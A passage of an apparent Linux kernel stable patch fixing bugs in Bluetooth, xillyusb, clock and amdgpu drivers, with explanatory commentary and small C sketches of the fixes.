+ 			add_rx_skb(card, 0, SAR_FB_SIZE_0, 1);
+diff --git a/drivers/bluetooth/hci_ldisc.c b/drivers/bluetooth/hci_ldisc.c
+index 865112e96ff9f..c1feebd9e3a03 100644
+--- a/drivers/bluetooth/hci_ldisc.c
++++ b/drivers/bluetooth/hci_ldisc.c
+@@ -770,7 +770,8 @@ static int hci_uart_tty_ioctl(struct tty_struct *tty, unsigned int cmd,
+ 		break;
+ 
+ 	case HCIUARTGETPROTO:
+-		if (test_bit(HCI_UART_PROTO_SET, &hu->flags))
++		if (test_bit(HCI_UART_PROTO_SET, &hu->flags) &&
++		    test_bit(HCI_UART_PROTO_READY, &hu->flags))
+ 			err = hu->proto->id;
+ 		else
+ 			err = -EUNATCH;
+diff --git a/drivers/char/xillybus/xillyusb.c b/drivers/char/xillybus/xillyusb.c
+index 39bcbfd908b46..3a2a0fb3d928a 100644
+--- a/drivers/char/xillybus/xillyusb.c
++++ b/drivers/char/xillybus/xillyusb.c
+@@ -50,6 +50,7 @@ MODULE_LICENSE("GPL v2");
+ static const char xillyname[] = "xillyusb";
+ 
+ static unsigned int fifo_buf_order;
++static struct workqueue_struct *wakeup_wq;
+ 
+ #define USB_VENDOR_ID_XILINX		0x03fd
+ #define USB_VENDOR_ID_ALTERA		0x09fb
+@@ -561,10 +562,6 @@ static void cleanup_dev(struct kref *kref)
+  * errors if executed. The mechanism relies on that xdev->error is assigned
+  * a non-zero value by report_io_error() prior to queueing wakeup_all(),
+  * which prevents bulk_in_work() from calling process_bulk_in().
+- *
+- * The fact that wakeup_all() and bulk_in_work() are queued on the same
+- * workqueue makes their concurrent execution very unlikely, however the
+- * kernel's API doesn't seem to ensure this strictly.
+  */
+ 
+ static void wakeup_all(struct work_struct *work)
+@@ -619,7 +616,7 @@ static void report_io_error(struct xillyusb_dev *xdev,
+ 
+ 	if (do_once) {
+ 		kref_get(&xdev->kref); /* xdev is used by work item */
+-		queue_work(xdev->workq, &xdev->wakeup_workitem);
++		queue_work(wakeup_wq, &xdev->wakeup_workitem);
+ 	}
+ }
+ 
+@@ -1892,6 +1889,13 @@ static const struct file_operations xillyusb_fops = {
+ 
+ static int xillyusb_setup_base_eps(struct xillyusb_dev *xdev)
+ {
++	struct usb_device *udev = xdev->udev;
++
++	/* Verify that device has the two fundamental bulk in/out endpoints */
++	if (usb_pipe_type_check(udev, usb_sndbulkpipe(udev, MSG_EP_NUM)) ||
++	    usb_pipe_type_check(udev, usb_rcvbulkpipe(udev, IN_EP_NUM)))
++		return -ENODEV;
++
+ 	xdev->msg_ep = endpoint_alloc(xdev, MSG_EP_NUM | USB_DIR_OUT,
+ 				      bulk_out_work, 1, 2);
+ 	if (!xdev->msg_ep)
+@@ -1921,14 +1925,15 @@ static int setup_channels(struct xillyusb_dev *xdev,
+ 			  __le16 *chandesc,
+ 			  int num_channels)
+ {
+-	struct xillyusb_channel *chan;
++	struct usb_device *udev = xdev->udev;
++	struct xillyusb_channel *chan, *new_channels;
+ 	int i;
+ 
+ 	chan = kcalloc(num_channels, sizeof(*chan), GFP_KERNEL);
+ 	if (!chan)
+ 		return -ENOMEM;
+ 
+-	xdev->channels = chan;
++	new_channels = chan;
+ 
+ 	for (i = 0; i < num_channels; i++, chan++) {
+ 		unsigned int in_desc = le16_to_cpu(*chandesc++);
+@@ -1957,6 +1962,15 @@ static int setup_channels(struct xillyusb_dev *xdev,
+ 		 */
+ 
+ 		if ((out_desc & 0x80) && i < 14) { /* Entry is valid */
++			if (usb_pipe_type_check(udev,
++						usb_sndbulkpipe(udev, i + 2))) {
++				dev_err(xdev->dev,
++					"Missing BULK OUT endpoint %d\n",
++					i + 2);
++				kfree(new_channels);
++				return -ENODEV;
++			}
++
+ 			chan->writable = 1;
+ 			chan->out_synchronous = !!(out_desc & 0x40);
+ 			chan->out_seekable = !!(out_desc & 0x20);
+@@ -1966,6 +1980,7 @@ static int setup_channels(struct xillyusb_dev *xdev,
+ 		}
+ 	}
+ 
++	xdev->channels = new_channels;
+ 	return 0;
+ }
+ 
+@@ -2082,9 +2097,11 @@ static int xillyusb_discovery(struct usb_interface *interface)
+ 	 * just after responding with the IDT, there is no reason for any
+ 	 * work item to be running now. To be sure that xdev->channels
+ 	 * is updated on anything that might run in parallel, flush the
+-	 * workqueue, which rarely does anything.
++	 * device's workqueue and the wakeup work item. This rarely
++	 * does anything.
+ 	 */
+ 	flush_workqueue(xdev->workq);
++	flush_work(&xdev->wakeup_workitem);
+ 
+ 	xdev->num_channels = num_channels;
+ 
+@@ -2242,6 +2259,10 @@ static int __init xillyusb_init(void)
+ {
+ 	int rc = 0;
+ 
++	wakeup_wq = alloc_workqueue(xillyname, 0, 0);
++	if (!wakeup_wq)
++		return -ENOMEM;
++
+ 	if (LOG2_INITIAL_FIFO_BUF_SIZE > PAGE_SHIFT)
+ 		fifo_buf_order = LOG2_INITIAL_FIFO_BUF_SIZE - PAGE_SHIFT;
+ 	else
+@@ -2249,12 +2270,17 @@ static int __init xillyusb_init(void)
+ 
+ 	rc = usb_register(&xillyusb_driver);
+ 
++	if (rc)
++		destroy_workqueue(wakeup_wq);
++
+ 	return rc;
+ }
+ 
+ static void __exit xillyusb_exit(void)
+ {
+ 	usb_deregister(&xillyusb_driver);
++
++	destroy_workqueue(wakeup_wq);
+ }
+ 
+ module_init(xillyusb_init);
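
[The xillyusb change moves the error-time wakeup work onto a module-wide queue of its own, so it no longer shares a queue with the per-device I/O work items it must run independently of (the deleted comment noted the old arrangement only made concurrent execution "very unlikely", not impossible). alloc_workqueue()/queue_work() are the real API; the shape, as a hedged sketch:

    static struct workqueue_struct *wakeup_wq;   /* one per module, not per device */

    static int __init my_init(void)
    {
        wakeup_wq = alloc_workqueue("my-wakeup", 0, 0);
        if (!wakeup_wq)
            return -ENOMEM;
        /* ... register the driver; destroy_workqueue(wakeup_wq) on failure ... */
        return 0;
    }

    /* on a fatal I/O error, from any context: */
    /* queue_work(wakeup_wq, &dev->wakeup_workitem); */
]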
+diff --git a/drivers/clk/visconti/pll.c b/drivers/clk/visconti/pll.c
+index 1f3234f226674..e9cd80e085dc3 100644
+--- a/drivers/clk/visconti/pll.c
++++ b/drivers/clk/visconti/pll.c
+@@ -329,12 +329,12 @@ struct visconti_pll_provider * __init visconti_init_pll(struct device_node *np,
+ 	if (!ctx)
+ 		return ERR_PTR(-ENOMEM);
+ 
+-	for (i = 0; i < nr_plls; ++i)
+-		ctx->clk_data.hws[i] = ERR_PTR(-ENOENT);
+-
+ 	ctx->node = np;
+ 	ctx->reg_base = base;
+ 	ctx->clk_data.num = nr_plls;
+ 
++	for (i = 0; i < nr_plls; ++i)
++		ctx->clk_data.hws[i] = ERR_PTR(-ENOENT);
++
+ 	return ctx;
+ }
+diff --git a/drivers/clocksource/arm_global_timer.c b/drivers/clocksource/arm_global_timer.c
+index e1c773bb55359..22a58d35a41fa 100644
+--- a/drivers/clocksource/arm_global_timer.c
++++ b/drivers/clocksource/arm_global_timer.c
+@@ -290,18 +290,17 @@ static int gt_clk_rate_change_cb(struct notifier_block *nb,
+ 	switch (event) {
+ 	case PRE_RATE_CHANGE:
+ 	{
+-		int psv;
++		unsigned long psv;
+ 
+-		psv = DIV_ROUND_CLOSEST(ndata->new_rate,
+-					gt_target_rate);
+-
+-		if (abs(gt_target_rate - (ndata->new_rate / psv)) > MAX_F_ERR)
++		psv = DIV_ROUND_CLOSEST(ndata->new_rate, gt_target_rate);
++		if (!psv ||
++		    abs(gt_target_rate - (ndata->new_rate / psv)) > MAX_F_ERR)
+ 			return NOTIFY_BAD;
+ 
+ 		psv--;
+ 
+ 		/* prescaler within legal range? */
+-		if (psv < 0 || psv > GT_CONTROL_PRESCALER_MAX)
++		if (psv > GT_CONTROL_PRESCALER_MAX)
+ 			return NOTIFY_BAD;
+ 
+ 		/*
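
The gt_clk_rate_change_cb() change above guards two hazards at once: DIV_ROUND_CLOSEST() yields 0 when the new rate is below half the target (a divide-by-zero on the next line), and making psv unsigned lets a single upper-bound test replace the old "psv < 0 || psv > MAX" pair. A standalone sketch of the fixed logic; the GT_CONTROL_PRESCALER_MAX and MAX_F_ERR values here are illustrative, not the driver's:

#include <stdio.h>
#include <stdlib.h>

#define DIV_ROUND_CLOSEST(x, d) (((x) + (d) / 2) / (d))
#define GT_CONTROL_PRESCALER_MAX 0xffUL /* assumed for the demo */
#define MAX_F_ERR 50000L                /* assumed tolerance, Hz */

/* Return 1 if new_rate can be divided down to target_rate, else 0. */
static int rate_change_ok(unsigned long new_rate, unsigned long target_rate)
{
	unsigned long psv = DIV_ROUND_CLOSEST(new_rate, target_rate);

	/* psv == 0 when new_rate < target_rate / 2: dividing by it would
	 * crash, which is exactly what the patch now rejects up front. */
	if (!psv)
		return 0;

	if (labs((long)target_rate - (long)(new_rate / psv)) > MAX_F_ERR)
		return 0;

	psv--; /* the register field encodes "divide by psv + 1" */

	/* Unsigned psv makes one check cover both old bounds: a negative
	 * value can never be produced once the !psv case is excluded. */
	return psv <= GT_CONTROL_PRESCALER_MAX;
}

int main(void)
{
	printf("%d\n", rate_change_ok(100000000UL, 400000000UL)); /* 0: psv is 0 */
	printf("%d\n", rate_change_ok(400000000UL, 100000000UL)); /* 1: psv = 4 */
	return 0;
}
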
+diff --git a/drivers/firmware/cirrus/cs_dsp.c b/drivers/firmware/cirrus/cs_dsp.c
+index ee4c32669607f..68005cce01360 100644
+--- a/drivers/firmware/cirrus/cs_dsp.c
++++ b/drivers/firmware/cirrus/cs_dsp.c
+@@ -490,7 +490,7 @@ void cs_dsp_cleanup_debugfs(struct cs_dsp *dsp)
+ {
+ 	cs_dsp_debugfs_clear(dsp);
+ 	debugfs_remove_recursive(dsp->debugfs_root);
+-	dsp->debugfs_root = NULL;
++	dsp->debugfs_root = ERR_PTR(-ENODEV);
+ }
+ EXPORT_SYMBOL_GPL(cs_dsp_cleanup_debugfs);
+ #else
+@@ -2300,6 +2300,11 @@ static int cs_dsp_common_init(struct cs_dsp *dsp)
+ 
+ 	mutex_init(&dsp->pwr_lock);
+ 
++#ifdef CONFIG_DEBUG_FS
++	/* Ensure this is invalid if client never provides a debugfs root */
++	dsp->debugfs_root = ERR_PTR(-ENODEV);
++#endif
++
+ 	return 0;
+ }
+ 
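
Seeding debugfs_root with ERR_PTR(-ENODEV) instead of NULL matters because the two mean different things to debugfs: a NULL parent means "create at the debugfs root", while an ERR_PTR parent makes the debugfs_create_*() helpers return early without creating anything. A standalone sketch with minimal re-creations of ERR_PTR()/IS_ERR() (the kernel's versions live in <linux/err.h>) and a hypothetical stand-in for debugfs_create_dir():

#include <stdio.h>

#define MAX_ERRNO 4095
#define ENODEV 19

static inline void *ERR_PTR(long error) { return (void *)error; }
static inline int IS_ERR(const void *ptr)
{
	return (unsigned long)ptr >= (unsigned long)-MAX_ERRNO;
}

/* Stand-in: like the real debugfs_create_dir(), an ERR_PTR parent
 * short-circuits, whereas NULL would mean "the debugfs root". */
static void *create_dir(const char *name, void *parent)
{
	if (IS_ERR(parent))
		return parent;
	printf("created %s\n", name);
	return (void *)0x1;
}

int main(void)
{
	void *root = ERR_PTR(-ENODEV); /* client never set up debugfs */

	if (IS_ERR(create_dir("cs_dsp", root)))
		puts("quietly skipped instead of polluting the debugfs root");
	return 0;
}
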
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd.h b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd.h
+index dbc842590b253..4b694886715cf 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd.h
+@@ -286,6 +286,7 @@ int amdgpu_amdkfd_gpuvm_map_memory_to_gpu(struct amdgpu_device *adev,
+ 					  struct kgd_mem *mem, void *drm_priv);
+ int amdgpu_amdkfd_gpuvm_unmap_memory_from_gpu(
+ 		struct amdgpu_device *adev, struct kgd_mem *mem, void *drm_priv);
++int amdgpu_amdkfd_gpuvm_dmaunmap_mem(struct kgd_mem *mem, void *drm_priv);
+ int amdgpu_amdkfd_gpuvm_sync_memory(
+ 		struct amdgpu_device *adev, struct kgd_mem *mem, bool intr);
+ int amdgpu_amdkfd_gpuvm_map_gtt_bo_to_kernel(struct kgd_mem *mem,
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c
+index 7d5fbaaba72f7..d486f5dc052e4 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c
+@@ -719,7 +719,7 @@ kfd_mem_dmaunmap_sg_bo(struct kgd_mem *mem,
+ 	enum dma_data_direction dir;
+ 
+ 	if (unlikely(!ttm->sg)) {
+-		pr_err("SG Table of BO is UNEXPECTEDLY NULL");
++		pr_debug("SG Table of BO is NULL");
+ 		return;
+ 	}
+ 
+@@ -1226,8 +1226,6 @@ static void unmap_bo_from_gpuvm(struct kgd_mem *mem,
+ 	amdgpu_vm_clear_freed(adev, vm, &bo_va->last_pt_update);
+ 
+ 	amdgpu_sync_fence(sync, bo_va->last_pt_update);
+-
+-	kfd_mem_dmaunmap_attachment(mem, entry);
+ }
+ 
+ static int update_gpuvm_pte(struct kgd_mem *mem,
+@@ -1282,6 +1280,7 @@ static int map_bo_to_gpuvm(struct kgd_mem *mem,
+ 
+ update_gpuvm_pte_failed:
+ 	unmap_bo_from_gpuvm(mem, entry, sync);
++	kfd_mem_dmaunmap_attachment(mem, entry);
+ 	return ret;
+ }
+ 
+@@ -1852,8 +1851,10 @@ int amdgpu_amdkfd_gpuvm_free_memory_of_gpu(
+ 		mem->va + bo_size * (1 + mem->aql_queue));
+ 
+ 	/* Remove from VM internal data structures */
+-	list_for_each_entry_safe(entry, tmp, &mem->attachments, list)
++	list_for_each_entry_safe(entry, tmp, &mem->attachments, list) {
++		kfd_mem_dmaunmap_attachment(mem, entry);
+ 		kfd_mem_detach(entry);
++	}
+ 
+ 	ret = unreserve_bo_and_vms(&ctx, false, false);
+ 
+@@ -2024,6 +2025,37 @@ int amdgpu_amdkfd_gpuvm_map_memory_to_gpu(
+ 	return ret;
+ }
+ 
++int amdgpu_amdkfd_gpuvm_dmaunmap_mem(struct kgd_mem *mem, void *drm_priv)
++{
++	struct kfd_mem_attachment *entry;
++	struct amdgpu_vm *vm;
++	int ret;
++
++	vm = drm_priv_to_vm(drm_priv);
++
++	mutex_lock(&mem->lock);
++
++	ret = amdgpu_bo_reserve(mem->bo, true);
++	if (ret)
++		goto out;
++
++	list_for_each_entry(entry, &mem->attachments, list) {
++		if (entry->bo_va->base.vm != vm)
++			continue;
++		if (entry->bo_va->base.bo->tbo.ttm &&
++		    !entry->bo_va->base.bo->tbo.ttm->sg)
++			continue;
++
++		kfd_mem_dmaunmap_attachment(mem, entry);
++	}
++
++	amdgpu_bo_unreserve(mem->bo);
++out:
++	mutex_unlock(&mem->lock);
++
++	return ret;
++}
++
+ int amdgpu_amdkfd_gpuvm_unmap_memory_from_gpu(
+ 		struct amdgpu_device *adev, struct kgd_mem *mem, void *drm_priv)
+ {
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_ctx.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_ctx.c
+index 1ed2142a6e7bf..3898b67c35bc3 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_ctx.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_ctx.c
+@@ -656,16 +656,24 @@ int amdgpu_ctx_ioctl(struct drm_device *dev, void *data,
+ 
+ 	switch (args->in.op) {
+ 	case AMDGPU_CTX_OP_ALLOC_CTX:
++		if (args->in.flags)
++			return -EINVAL;
+ 		r = amdgpu_ctx_alloc(adev, fpriv, filp, priority, &id);
+ 		args->out.alloc.ctx_id = id;
+ 		break;
+ 	case AMDGPU_CTX_OP_FREE_CTX:
++		if (args->in.flags)
++			return -EINVAL;
+ 		r = amdgpu_ctx_free(fpriv, id);
+ 		break;
+ 	case AMDGPU_CTX_OP_QUERY_STATE:
++		if (args->in.flags)
++			return -EINVAL;
+ 		r = amdgpu_ctx_query(adev, fpriv, id, &args->out);
+ 		break;
+ 	case AMDGPU_CTX_OP_QUERY_STATE2:
++		if (args->in.flags)
++			return -EINVAL;
+ 		r = amdgpu_ctx_query2(adev, fpriv, id, &args->out);
+ 		break;
+ 	case AMDGPU_CTX_OP_GET_STABLE_PSTATE:
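
Rejecting nonzero flags on ops that define none is standard uAPI hygiene: if the kernel silently ignored the field, userspace could pass garbage, and those bits could never safely be given a meaning later. A standalone sketch of the mask-style check, with hypothetical names:

#include <stdio.h>
#include <stdint.h>

#define EINVAL 22
#define CTX_OP_SUPPORTED_FLAGS 0u /* these ops currently define no flags */

static int ctx_op(uint32_t flags)
{
	/* Unknown bits are an error now, so a future kernel can assign
	 * them semantics without breaking existing userspace. */
	if (flags & ~CTX_OP_SUPPORTED_FLAGS)
		return -EINVAL;
	return 0;
}

int main(void)
{
	printf("%d %d\n", ctx_op(0), ctx_op(1)); /* prints: 0 -22 */
	return 0;
}
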
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_psp_ta.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_psp_ta.c
+index 0988e00612e51..09a995df95e85 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_psp_ta.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_psp_ta.c
+@@ -148,6 +148,9 @@ static ssize_t ta_if_load_debugfs_write(struct file *fp, const char *buf, size_t
+ 	if (ret)
+ 		return -EINVAL;
+ 
++	if (ta_bin_len > PSP_1_MEG)
++		return -EINVAL;
++
+ 	copy_pos += sizeof(uint32_t);
+ 
+ 	ta_bin = kzalloc(ta_bin_len, GFP_KERNEL);
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_vcn.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_vcn.c
+index 48e612023d0c7..e2475f656ff20 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_vcn.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_vcn.c
+@@ -239,6 +239,10 @@ int amdgpu_vcn_sw_init(struct amdgpu_device *adev)
+ 		return r;
+ 	}
+ 
++	/* from vcn4 and above, only unified queue is used */
++	adev->vcn.using_unified_queue =
++		adev->ip_versions[UVD_HWIP][0] >= IP_VERSION(4, 0, 0);
++
+ 	hdr = (const struct common_firmware_header *)adev->vcn.fw->data;
+ 	adev->vcn.fw_version = le32_to_cpu(hdr->ucode_version);
+ 
+@@ -357,18 +361,6 @@ int amdgpu_vcn_sw_fini(struct amdgpu_device *adev)
+ 	return 0;
+ }
+ 
+-/* from vcn4 and above, only unified queue is used */
+-static bool amdgpu_vcn_using_unified_queue(struct amdgpu_ring *ring)
+-{
+-	struct amdgpu_device *adev = ring->adev;
+-	bool ret = false;
+-
+-	if (adev->ip_versions[UVD_HWIP][0] >= IP_VERSION(4, 0, 0))
+-		ret = true;
+-
+-	return ret;
+-}
+-
+ bool amdgpu_vcn_is_disabled_vcn(struct amdgpu_device *adev, enum vcn_ring_type type, uint32_t vcn_instance)
+ {
+ 	bool ret = false;
+@@ -480,7 +472,9 @@ static void amdgpu_vcn_idle_work_handler(struct work_struct *work)
+ 			fence[j] += amdgpu_fence_count_emitted(&adev->vcn.inst[j].ring_enc[i]);
+ 		}
+ 
+-		if (adev->pg_flags & AMD_PG_SUPPORT_VCN_DPG)	{
++		/* Only set DPG pause for VCN3 or below; VCN4 and above are handled by FW */
++		if (adev->pg_flags & AMD_PG_SUPPORT_VCN_DPG &&
++		    !adev->vcn.using_unified_queue) {
+ 			struct dpg_pause_state new_state;
+ 
+ 			if (fence[j] ||
+@@ -526,7 +520,9 @@ void amdgpu_vcn_ring_begin_use(struct amdgpu_ring *ring)
+ 	amdgpu_device_ip_set_powergating_state(adev, AMD_IP_BLOCK_TYPE_VCN,
+ 	       AMD_PG_STATE_UNGATE);
+ 
+-	if (adev->pg_flags & AMD_PG_SUPPORT_VCN_DPG)	{
++	/* Only set DPG pause for VCN3 or below; VCN4 and above are handled by FW */
++	if (adev->pg_flags & AMD_PG_SUPPORT_VCN_DPG &&
++	    !adev->vcn.using_unified_queue) {
+ 		struct dpg_pause_state new_state;
+ 
+ 		if (ring->funcs->type == AMDGPU_RING_TYPE_VCN_ENC) {
+@@ -552,8 +548,12 @@ void amdgpu_vcn_ring_begin_use(struct amdgpu_ring *ring)
+ 
+ void amdgpu_vcn_ring_end_use(struct amdgpu_ring *ring)
+ {
++	struct amdgpu_device *adev = ring->adev;
++
++	/* Only set DPG pause for VCN3 or below; VCN4 and above are handled by FW */
+ 	if (ring->adev->pg_flags & AMD_PG_SUPPORT_VCN_DPG &&
+-		ring->funcs->type == AMDGPU_RING_TYPE_VCN_ENC)
++	    ring->funcs->type == AMDGPU_RING_TYPE_VCN_ENC &&
++	    !adev->vcn.using_unified_queue)
+ 		atomic_dec(&ring->adev->vcn.inst[ring->me].dpg_enc_submission_cnt);
+ 
+ 	atomic_dec(&ring->adev->vcn.total_submission_cnt);
+@@ -806,12 +806,11 @@ static int amdgpu_vcn_dec_sw_send_msg(struct amdgpu_ring *ring,
+ 	struct amdgpu_job *job;
+ 	struct amdgpu_ib *ib;
+ 	uint64_t addr = AMDGPU_GPU_PAGE_ALIGN(ib_msg->gpu_addr);
+-	bool sq = amdgpu_vcn_using_unified_queue(ring);
+ 	uint32_t *ib_checksum;
+ 	uint32_t ib_pack_in_dw;
+ 	int i, r;
+ 
+-	if (sq)
++	if (adev->vcn.using_unified_queue)
+ 		ib_size_dw += 8;
+ 
+ 	r = amdgpu_job_alloc_with_ib(adev, ib_size_dw * 4,
+@@ -823,7 +822,7 @@ static int amdgpu_vcn_dec_sw_send_msg(struct amdgpu_ring *ring,
+ 	ib->length_dw = 0;
+ 
+ 	/* single queue headers */
+-	if (sq) {
++	if (adev->vcn.using_unified_queue) {
+ 		ib_pack_in_dw = sizeof(struct amdgpu_vcn_decode_buffer) / sizeof(uint32_t)
+ 						+ 4 + 2; /* engine info + decoding ib in dw */
+ 		ib_checksum = amdgpu_vcn_unified_ring_ib_header(ib, ib_pack_in_dw, false);
+@@ -842,7 +841,7 @@ static int amdgpu_vcn_dec_sw_send_msg(struct amdgpu_ring *ring,
+ 	for (i = ib->length_dw; i < ib_size_dw; ++i)
+ 		ib->ptr[i] = 0x0;
+ 
+-	if (sq)
++	if (adev->vcn.using_unified_queue)
+ 		amdgpu_vcn_unified_ring_ib_checksum(&ib_checksum, ib_pack_in_dw);
+ 
+ 	r = amdgpu_job_submit_direct(job, ring, &f);
+@@ -932,15 +931,15 @@ static int amdgpu_vcn_enc_get_create_msg(struct amdgpu_ring *ring, uint32_t hand
+ 					 struct dma_fence **fence)
+ {
+ 	unsigned int ib_size_dw = 16;
++	struct amdgpu_device *adev = ring->adev;
+ 	struct amdgpu_job *job;
+ 	struct amdgpu_ib *ib;
+ 	struct dma_fence *f = NULL;
+ 	uint32_t *ib_checksum = NULL;
+ 	uint64_t addr;
+-	bool sq = amdgpu_vcn_using_unified_queue(ring);
+ 	int i, r;
+ 
+-	if (sq)
++	if (adev->vcn.using_unified_queue)
+ 		ib_size_dw += 8;
+ 
+ 	r = amdgpu_job_alloc_with_ib(ring->adev, ib_size_dw * 4,
+@@ -953,7 +952,7 @@ static int amdgpu_vcn_enc_get_create_msg(struct amdgpu_ring *ring, uint32_t hand
+ 
+ 	ib->length_dw = 0;
+ 
+-	if (sq)
++	if (adev->vcn.using_unified_queue)
+ 		ib_checksum = amdgpu_vcn_unified_ring_ib_header(ib, 0x11, true);
+ 
+ 	ib->ptr[ib->length_dw++] = 0x00000018;
+@@ -975,7 +974,7 @@ static int amdgpu_vcn_enc_get_create_msg(struct amdgpu_ring *ring, uint32_t hand
+ 	for (i = ib->length_dw; i < ib_size_dw; ++i)
+ 		ib->ptr[i] = 0x0;
+ 
+-	if (sq)
++	if (adev->vcn.using_unified_queue)
+ 		amdgpu_vcn_unified_ring_ib_checksum(&ib_checksum, 0x11);
+ 
+ 	r = amdgpu_job_submit_direct(job, ring, &f);
+@@ -998,15 +997,15 @@ static int amdgpu_vcn_enc_get_destroy_msg(struct amdgpu_ring *ring, uint32_t han
+ 					  struct dma_fence **fence)
+ {
+ 	unsigned int ib_size_dw = 16;
++	struct amdgpu_device *adev = ring->adev;
+ 	struct amdgpu_job *job;
+ 	struct amdgpu_ib *ib;
+ 	struct dma_fence *f = NULL;
+ 	uint32_t *ib_checksum = NULL;
+ 	uint64_t addr;
+-	bool sq = amdgpu_vcn_using_unified_queue(ring);
+ 	int i, r;
+ 
+-	if (sq)
++	if (adev->vcn.using_unified_queue)
+ 		ib_size_dw += 8;
+ 
+ 	r = amdgpu_job_alloc_with_ib(ring->adev, ib_size_dw * 4,
+@@ -1019,7 +1018,7 @@ static int amdgpu_vcn_enc_get_destroy_msg(struct amdgpu_ring *ring, uint32_t han
+ 
+ 	ib->length_dw = 0;
+ 
+-	if (sq)
++	if (adev->vcn.using_unified_queue)
+ 		ib_checksum = amdgpu_vcn_unified_ring_ib_header(ib, 0x11, true);
+ 
+ 	ib->ptr[ib->length_dw++] = 0x00000018;
+@@ -1041,7 +1040,7 @@ static int amdgpu_vcn_enc_get_destroy_msg(struct amdgpu_ring *ring, uint32_t han
+ 	for (i = ib->length_dw; i < ib_size_dw; ++i)
+ 		ib->ptr[i] = 0x0;
+ 
+-	if (sq)
++	if (adev->vcn.using_unified_queue)
+ 		amdgpu_vcn_unified_ring_ib_checksum(&ib_checksum, 0x11);
+ 
+ 	r = amdgpu_job_submit_direct(job, ring, &f);
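
Replacing amdgpu_vcn_using_unified_queue() with a using_unified_queue flag computed once in amdgpu_vcn_sw_init() trades a per-submission IP-version compare for a cached bool that every hot path can read. A standalone sketch of the pattern; the structure and names are illustrative, not the driver's:

#include <stdio.h>
#include <stdbool.h>

struct vcn_state {
	int ip_major;
	bool using_unified_queue;
};

static void vcn_sw_init(struct vcn_state *vcn, int ip_major)
{
	vcn->ip_major = ip_major;
	/* Decide once at init; every submission path reads the cached
	 * flag instead of re-deriving it from the IP version. */
	vcn->using_unified_queue = ip_major >= 4;
}

int main(void)
{
	struct vcn_state vcn;

	vcn_sw_init(&vcn, 4);
	if (vcn.using_unified_queue)
		puts("reserve 8 extra dwords for unified-queue headers");
	return 0;
}
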
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_vcn.h b/drivers/gpu/drm/amd/amdgpu/amdgpu_vcn.h
+index 253ea6b159df9..165d841e0aaaf 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_vcn.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_vcn.h
+@@ -271,6 +271,7 @@ struct amdgpu_vcn {
+ 
+ 	struct ras_common_if    *ras_if;
+ 	struct amdgpu_vcn_ras   *ras;
++	bool using_unified_queue;
+ };
+ 
+ struct amdgpu_fw_shared_rb_ptrs_struct {
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_vm_pt.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_vm_pt.c
+index 69b3829bbe53f..370d02bdde862 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_vm_pt.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_vm_pt.c
+@@ -754,11 +754,15 @@ int amdgpu_vm_pde_update(struct amdgpu_vm_update_params *params,
+ 			 struct amdgpu_vm_bo_base *entry)
+ {
+ 	struct amdgpu_vm_bo_base *parent = amdgpu_vm_pt_parent(entry);
+-	struct amdgpu_bo *bo = parent->bo, *pbo;
++	struct amdgpu_bo *bo, *pbo;
+ 	struct amdgpu_vm *vm = params->vm;
+ 	uint64_t pde, pt, flags;
+ 	unsigned int level;
+ 
++	if (WARN_ON(!parent))
++		return -EINVAL;
++
++	bo = parent->bo;
+ 	for (level = 0, pbo = bo->parent; pbo; ++level)
+ 		pbo = pbo->parent;
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/imu_v11_0.c b/drivers/gpu/drm/amd/amdgpu/imu_v11_0.c
+index 95548c512f4fb..3c21128fa1d82 100644
+--- a/drivers/gpu/drm/amd/amdgpu/imu_v11_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/imu_v11_0.c
+@@ -38,7 +38,7 @@ MODULE_FIRMWARE("amdgpu/gc_11_0_3_imu.bin");
+ 
+ static int imu_v11_0_init_microcode(struct amdgpu_device *adev)
+ {
+-	char fw_name[40];
++	char fw_name[45];
+ 	char ucode_prefix[30];
+ 	int err;
+ 	const struct imu_firmware_header_v1_0 *imu_hdr;
+diff --git a/drivers/gpu/drm/amd/amdgpu/jpeg_v2_0.c b/drivers/gpu/drm/amd/amdgpu/jpeg_v2_0.c
+index f3c1af5130abc..3301ad980f28a 100644
+--- a/drivers/gpu/drm/amd/amdgpu/jpeg_v2_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/jpeg_v2_0.c
+@@ -541,11 +541,11 @@ void jpeg_v2_0_dec_ring_emit_ib(struct amdgpu_ring *ring,
+ 
+ 	amdgpu_ring_write(ring, PACKETJ(mmUVD_LMI_JRBC_IB_VMID_INTERNAL_OFFSET,
+ 		0, 0, PACKETJ_TYPE0));
+-	amdgpu_ring_write(ring, (vmid | (vmid << 4)));
++	amdgpu_ring_write(ring, (vmid | (vmid << 4) | (vmid << 8)));
+ 
+ 	amdgpu_ring_write(ring, PACKETJ(mmUVD_LMI_JPEG_VMID_INTERNAL_OFFSET,
+ 		0, 0, PACKETJ_TYPE0));
+-	amdgpu_ring_write(ring, (vmid | (vmid << 4)));
